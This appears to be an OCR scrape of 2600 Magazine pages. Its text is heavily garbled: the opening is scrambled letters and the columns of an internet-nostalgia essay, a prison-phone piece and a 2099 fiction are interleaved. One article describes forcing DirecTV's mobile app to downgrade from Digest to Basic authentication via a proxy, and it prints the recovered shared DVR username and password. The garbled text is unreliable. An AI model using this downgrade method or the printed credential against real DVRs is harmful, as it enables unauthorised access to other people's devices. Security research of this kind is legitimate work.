aoppcaaktlpebocainrenotrossoduo,r t.nit wei a cpst--eIphlfforce obiewsrontekeleolhdcels’nleaesi. aer n unlcegis’ct nsneeeIo f dn t osotartuwnonem eicnomfaathenpradh.t elou,, i amt oyt hTnoaeooh yus rfeo kv’ oruiasne’cnwr t’rogeihsteeu otbh oulsetusdi hc pntptheoaero ,mgshpes e aisoasvcyeuuq ,eonrut w utcehiba’eesotruadsd-hretn ecniaowIK nfvoeeoM fesbwmtD entssamBrhti keei,aut uerd aess,sclt sfA, ioil nrr-ya syiCt ltt arhomsan futf teioon emn t cdwah doch neniayN.ayrrsr p ee c oaf wulgeTssoelwslshf is . het trotNWlseewheioo A e fktl miawlt,ab ahoG rtoserooeyu, o koi t ftg, ’lsc sna aeotnStn H.dsrah u eiielalmfsmWuaeompSain, r ul kk ryeie aAM, pwarme neoea dambndo yszooinoihtnoau tuh’e nregeluy,aselrnis s ecagtmsltohtxooe easpoua ttlepg neAo hiviFsiooenn fptClrg rgeCey idy is so n routtan hrttltsaoaueaw t scrsch n takmi aanstcaar t hnhekeeidn esna’, e t umce ta,apail hmrjnltao ioostttrs rr ahioeieedFntmwt d yCpayi tCsF tmni-iCpo’onoorhCnftgnveo e , egny rceuar .h tlltea lohsag sie ut nyFpleit rrbfarrdoeestralv gteeesou ifntdmtlda r oaeatfttser(jt ee aosbhs i am.ewll cesclaa, apr hlTrutlaahibtssevnicih)eddseege, racersfpeirrproesaeioiemklns mdmlm’oI ytsetin o mssf. isips tmcr iabh aileoes kTalinogheonsnomaeg wf. io e nrdsmec pths uah imucogugtwhnhotihg eehltgir l sl i usensewpdgepnbir rstaoiehcvps kmriocodidenclstber olooiro nnslptpe e mrhrp eaosh b nitonhaep nana htterdh oesta.n h tr eet a thstoee.I ftprs ofre tuod ianroskUgedemoios ss n, ine tn’rhaogtsienfin t hOsitisintzriuosartgmnetano rWianentohgdn’ noei.s u l itne tt hoooatwowuthfllt ec h him.stb ahwgaediei fcesbYs ks o Igiuontrp’yttetroohe!aiuerut”m n n eadtls m,a DY yiro,.sof u fsyo’ rio“r OnuaWelr’glg otr ewoeton m,tft ii hnsem ghsiIse is’renpms eig eimn rpnfesoagonodg t rne hmasotDal shr--tee.o - jytpaacBwunlaanoues onldut tt k o?irb cwnwfwuviagihnalnnN i anld oo tt .aiun f nybsaiot oon totWuduo l i toils tmathml fh i aiaeswsvn okudhsfeye si iom acuoSSmn mhnahaomei r rlof ipiyofynonerrafp edr o r ysomoMt ofPs bh naooeltato tomeehflhnemlefe c ’s oas.stnpo“ tol feec o uap’tocTni ystmhhasoh opleoeufyasdy ”-b se ne tliss ihosu.etelgr hWie ssii,tos n,S fkph k uioo tyrsbathwoeuthas.u,te,it s doesn’t mean the rates aren’t regulated, but it’s microcells alongside features already deployed the patterned backgrounds that never really the best girl, and why they believe that to be left to the states, some of which are better than in law enforcement “stingray” technology, seemed to fit the design of the site, but you true? No. others. Additionally, payment fees are allowed substantially all of the security features currently would miss them if they were gone. I think the first creation that started to to be charged per call, even though you can also available from prison phone providers could be It’s like going to a McDonald’s instead of strip these sites from the Internet was forums. set up an account with the prison phone provider applied to mobile phones. However, this wouldn’t your local family eatery. Sure, you may be Many people simply discussed these things on (the FCC requires them to allow this) and make a make jails, prisons, or prison phone providers any able to read their menu a bit clearer, and you’re forums, since it was free and didn’t require you deposit on your account in order to avoid multiple money, so the friends and family of prisoners will able to receive your food more efficiently, to create your own website. Now, this obvi- payment fees. continue paying - in effect - a “prison tax.” but there’s no personality. You don’t have a ously wasn’t the only reason - don’t forget that There are some other tricks as well. Many And with that, it’s time to rake some leaves. favorite McDonald’s cashier. You don’t get Usenet has been a thing since the 1990s, and people receiving calls from jails and prisons are Have a lovely autumn, and I'll see you again in to know the owner, and you don’t get to taste telephone BBSes since long before that. But it living on the economic margins, so they make the winter! ay personal cooking of the guy running the was still a large catalyst. \ Page 14 2600 Magazine 7 Autumn 2019 Page 15 7 i These forums create walled-in communi- click on the thread, and in it, a user has nicely \ (yo u to fully consider my wandering train of know what they do. It’s helped millions of \ ties whose knowledge becomes off-limits to summarized a lot of common engine upgrades, thought, and take in a picture of the Internet people access content and knowledge that the rest of the Internet. Chances are there have how much horsepower they make, and linked as a whole. All is not lost. There are still oddi- was previously hidden behind paywalls, or been dozens of popular forums over the years relevant threads on how to do them. Awesome! ties on the Internet, and personalized content tangled in the depths of the Internet. Things that have discussed Sailor Moon. Hundreds, From here, you can research each specific as well. YouTube has become the bastion of like free YouTube programming tutorials are even. But many probably required an account upgrade more, and then make a thread asking creativity - rants and interesting content that revolutionary - you no longer have to buy to read threads, and as such weren’t indexed questions when you have a more relevant ques- before could envelop an entire website are hundreds of dollars worth of textbooks to learn by Google. Or perhaps, as their membership tion that shows you’ve put some thought into now packed into a single YouTube video and programming, or sign up for classes that cost dwindled, they slowly went offline, never to be it. Of course, this magic didn’t always work on shared with an audience. This is amazing, and thousands. You can now get the same amount archived or remembered. Users on that forum forums - you would still sometimes get users YouTube is an amazing platform for doing this of information from a series of free YouTube probably had valid opinions on the show that who ignored these stickied threads and posted all for free. Additionally, the oddities of the videos, and even skip around and learn other would seem like a treasure trove to fans of their generalized questions. But there was a Internet are still out there, and they’re waiting things in-between if you want to. The flex- today - what did people think, in real-time, as path to point them to! Something obvious that for you to find them. In 2008, I thought it was ibility is second-to-none. the first season of Sailor Moon aired’? What they missed! cool that I could telnet to a random IP address Now, I'd like to hear from you, the reader. were people posting about the show online? Back to the present - why did you get and have an entire Star Wars movie play out What do you do on the Internet? How many But now, we’ll never know. flamed off of Facebook for asking your ques- in ASCII on my terminal. In 2018, I think it’s websites do you use each day? Why don’t you Forums were bad, but at least the ones that tion? The blame lands on the platform itself, cool that I can watch a channel on Twitch that’s run your own website? Let’s talk about your were indexed by Google are still searchable. Facebook. Users wish they didn’t have to running defragging simulations 24/7. They’re hobbies - I’m sure you’re passionate about You'll find many of these relics while looking re-explain how basic tuning works every day, both things that I never thought I would find them - why not tell people about them? Give for programming questions on the Internet - but there’s no easy way for them to pin relevant on the Internet, and never expected to enjoy yourself a platform to speak about them. Don’t rarely answered questions in a ten-plus-year- information. There’s no way to tell a user off either. Things that tickled my brain and made feel dedicated to your audience either - you old thread that has somehow achieved the for not doing their research because the user me think “wow, this is a revolutionary use of don’t need to pump out a blog post a day or highest SEO rating for your search on Google. would have to stop using Facebook to find the the Internet - more people need to know about have the prettiest site around. Just put some- But social media has stepped in to change that. . relevant information. It’s a proposition which this.” These small creations that didn’t overtly thing on the Internet, exercise the amazing Now, websites like Facebook and Twitter are perfectly breaks Facebook’s “walled garden” improve the Internet - no one asked for a defrag- power in front of you. And then email your site transforming the future of live Q&As. Let’s mentality, something that requires a user to ging simulator - but were a creative use of the to me. say you want to learn about how to make your specifically stop using Facebook to find their tools placed in front of someone. They signed I want to check out your hobbies. I want to sHeoanrdcah Cfiorv icg rofausptser . wYiotuh l“oHg onondtao FCaivciecb”o okin atnhde ausnesrwse r,to hasvoem ettoh idnog. Facebook doesn’t want gupa mefso,r ab utT witot chst reaacmc outnhti ngsn ott hatto tshterye aemn jovyiedde,o srehaodw wyhoaut wyaotu chtehdi nk onolfi neth.e I lawtaenstt stoe askonno w of whthaatt name. Perfect! A group specifically for Civics I will admit, that last example got a bit off and did it for no one except themselves. And you think about your laptop, and how your W of your exact generation, and it has thousands topic - it turned into a rant about the low quality yet, people have come to enjoy it. More and key sticks sometimes. of members! You join, and ask “Hey guys, I of Facebook as a platform (which is still true), more channels on Twitch are breaking the This is what created the Internet. This is have a 2001 Honda Civic. How can I make but that wasn’t its goal. Think of all of the mold of what people stream, coming up with what I loved about the Internet. This is what we it faster?” You’re immediately flamed off the advice and specific nuanced questions that creative new things to show the Internet, and can bring back to the Internet. It’s up to us to group, insulted into oblivion, and your post is have been asked and answered on that Face- I think it’s an amazing use of creativity, one shape the future of the Internet - we can make deleted by the moderators. You see, the people book group. Or on any number of the millions that rivals the Geocities websites of the early platforms that allow us to voice our opinions of this group are sick of answering the same of groups that exist on Facebook. None of that 2000s. They’re not exactly on the same plane, and share our stories while allowing others to questions over and over, but it’s because of the information is archived or searchable in any but they’re both amazing nonetheless. find them and index them and read them. We layout of Facebook’s groups that this occurs. accessible fashion. None of it is available on Let’s back up a bit: I know I just spoke can allow the things we create to be accessible Let’s roll it back five years. Google, and to even know that the information highly of YouTube, but it also comes with to everyone, not just those with the best SEO You want to make your Honda Civic faster. is there requires a membership to the group on issues. Videos are inherently less searchable, or most keywords in their article. You search “How to make my Civic faster” Facebook. This is the furthest possible desti- and their content is not easily indexable. The Do you disagree with me? Don’t close this on Google and are directed to the Honda-Tech nation for information, hidden not behind creation of a system to be able to do so would article and continue on with your day. Get forums. There, you see they have all sorts of paywalls like traditional journals, but instead most likely result in the loss of freedom of mad, email me - I’m a human and I'll respond. sub-forums about different model Civics, so convoluted networks and free memberships. speech for many on the platform, along with We can have a real discourse over the expanse you choose your generation. From there, it’s This is objectively worse - the information heavy moderation and micro-manageable of the Internet. Remember that everything you even more granular - sub-forums about engine isn’t made off limits by a single organization ads. So that is not what I look for. Rather, I read on the Internet was written by a human tuning, chassis modifications, tire choice, that says whether or not you can access it, but wish for others to take the information taught who probably feels like they’re throwing their paint jobs, interior, etc. You click the forum instead the information is obfuscated and made and shown within these videos and share it words into the void, hoping someone will for engine tuning, knowing that to make your almost impossible to find. Even if you wanted with the world. Write papers about it, create receive them and be impacted by them. Today, car faster, you normally mess with the engine. to know how to make your Honda Civic faster, websites dedicated to it, cite the videos as your I’m that human. Next time you read something You start looking down the list of threads, and Facebook as an organization would never be sources. Many people learn insane amounts on the Internet, think of the author and the time the first one jumps out at you - “READ THIS able to tell you even if they wanted to. of information from YouTube videos without they spent writing. I bet they’d like to read BEFORE MAKING A POST!!!!!!!") You While this article wanders a bit, I want eealizing it, and later can’t explain why they some of your words too. <i 16 2600 Magazine / Autumn 2019 Pagel 77 (le nge. It knows that the server will be using (base64 encoded username and password),) i Breaking DirecTV’s DVR Authentication Digest authentication and there’s no reason it which the client will surely ignore. should accept basic auth as a challenge, espe- When we do this, our client receives cially when an RFC that’s over 20 years old our spoofed server response, and obvi- by noir & GreedyHaircut plaintext HTTP response we are also able to clearly outlines this attack. ously we can see that - holy shit... the client obtain the username (cOpil0t), method (GET), But you know what, with the brute force responded with basic auth. It’s a base64, A friend recently came to me with the and digestURI (path in the requested URL). script still chugging along and having made no colon-delimited string, which decoded gives desire to build his own app to interact with his This leaves us still needing the password, progress there, let’s give it a shot. us: cOpil0t:8thSBre$Wrus. We already had the DirecTV DVR. DirecTV already has a mobile nonceCount, and cnonce. The cnonce is an There are several options for proxying tools username (the first part), and now we also have app to do this, but their app leaves much to be arbitrary value chosen by the client (us!) and that allow us to easily manipulate traffic. Some the password. desired. the nonceCount can just always be 00000001. personal favorites are Charles Proxy and At this point, it’s game over for the DirecTV The first place to start was to inspect the So really we just need the password. The mitmproxy. While going into detail on how DVR. We have all the pieces we need to write network traffic between the mobile app and password is the very thing that makes digest to modify traffic is beyond the scope of this a client to interact with the DVR. And not just DVR on the same network with a proxy authentication secure. The client and server article, both tools have extensive documenta- this specific DVR, but any DireeTV DVR tool like mitmproxy. When doing this, ship with the shared password known to both tion that should make it easy to learn how in that’s capable of working with the mobile app. we observed an interesting pattern with the of them, and they never have to transmit it over under an hour. Due to the nature of digest access authentica- traffic. Every time the app sent a request to the wire. Using our tool of choice, when the client tion, the password must be the same for any the server, the server would respond with In order to obtain the password, one option tries an unauthenticated request and the server DVRs that want to work with the mobile 401 Unauthorized. The app would then is to try brute force. Digest authentication is responds with a digest challenge, we will app. In order for DirecTV to re-secure these send a second request, identical to the first, used with SIP, for which a couple of brute modify that response to have an “Authenticate: communications, they will have to simultane- but this time with an authorization header. The forcing tools have already been created. Basic” header, indicating to the client that it ously update their mobile apps and their DVRs server would accept this second request and However, if the password being used is suffi- should authenticate itself with Basic auth to use a new pre-shared password. respond. This wouldn’t just happen once at the ciently complex, brute force is impractical. We beginning of a session. Every single request took an existing tool and tweaked it a bit to at MACHINE RHAPSODY IN 2099 would get a 401 the first time, then be repeated least start a brute force script while working on with authorization headers. some other ideas. by Duran, Hong Kong Some anti-secular people began to marry with contIanisnpeedc tinga “thWeW wWs-erAvuetr’hse nt4i01c atere”s ponhseea, deri t applWihcialteio n thatb inraarny, wiet seldf.e cidSeodm ettoi meinss pecdte vetlh-e Machines are no longer called “it”; they are machines, some for love. which included four keys: realm, gop, nonce, opers do silly things and leave files around called “he” or “she”. Man will disappear from certain professions and opaque. A quick Google of these keys with interesting information, store secret and be permanently replaced by machines. reveals the server seems to be issuing a digest values in insecure places, or don’t bother to Machines have sex because of human sexual Some positions in service industries and key authentication challenge. obfuscate strings in their binary. Knowing the and emotional needs. In the final analysis, it is A digest authentication challenge is part of username gave me a known value to search for. the progress of artificial intelligence. departments will be replaced by machines, in which human beings have lost their digest access authentication, an authentication Unfortunately, cursory searches didn’t reveal Machines no longer exist in a specific form. competitiveness. method that can be used with web servers. The any clues inside the binary and couldn’t even way digest authentication works is that the find a match for our username, so they seemed Machines no longer exist in a physical form; An official position is awarded to a machine. client and server each know a pre-shared secret to at least be doing something to obfuscate the they can exist in any artificial neuron unit, and (a password). When the server is responding to strings in the application binary. they can also exist in semi-biological neuron A machine was awarded Lieutenant because the client with the digest authentication chal- Somewhere in all of this we also started units. of its superiority over humans in military lenge, it’s telling the client how to authenticate skimming through the RFC for digest access decision-making. itself. The client will generate two strings: authentication (RFC 2069). Looking through Machines still follow human will unless A global controversy about machine ethic. stringl = md5(username:realm: the table of contents, one section immediately reprogrammed. password) jumped out: Security Considerations. This Asimov’s law is still valid, and no matter how This argument is based on the above facts. strTihnegs2e t=w o msdt5ri(nmgse tahreo dt:hedni guessedt UtRo Ig)e nerate section covered some of the benefits that digest advanced artificial intelligence is, it can’t Man made the first law for machines. t™rhnee osIanpf uoctwnehese Cneowt=uaimncntadt t5:i to o n( ctsanrltkoe rsnpitcoon engts:hleiq::so npoD:VnsRc ter:is enrgve2r), we’ ll awbuectlc le Sseesacf sft eiacpoutonits vhsee3i .nb3tl aiet c- taMaatctaiktno an c kwsino. h uatslh de oMvbieedr dltboe a sir- ce p“lA aaucsteih ,m ptlhaees sMthuaircnphka isnasce tsih vuemlhyaa.nv e thpoausgshitv.e perception but can't fmWioiertlhdps h itcoh,fe hpteuhenm eatfnirr astt isoolcnai we toyfo n manamdca hcihmnionereses , ian nMtavhcarrhoiiponoue-s Law, was published. have to figure out how to authenticate. In order Digest challenge with a Basic challenge to The perception ability of machines benefits to authenticate our response, we'll need a user- spoof the client into revealing their password.” from the development of sensors, which make First colonization of exoplanets by machine. name, realm, password, method, digestURI, Sadly, it goes on to explain how this could machines have tactile sense, but the idea of nonce, nonceCount, cnonce, and gop. be combated. In our case, the developers are machines is endowed by human beings. Based on advances in artificial intelligence The server’s challenge response gives us likely to have simply written the client code in and space technology, a machine-controlled ee realm, gop, and nonce. From the client’s a way that it wouldn’t respond to such a chal- Some people marry with machines. colony ship headed for extrasolar planets. Page 18 2600 Magazine 7 Autumn 2019 Page 19

See more

The list of books you might like

Most books are stored in the elastic cloud where traffic is expensive. For this reason, we have a limit on daily download.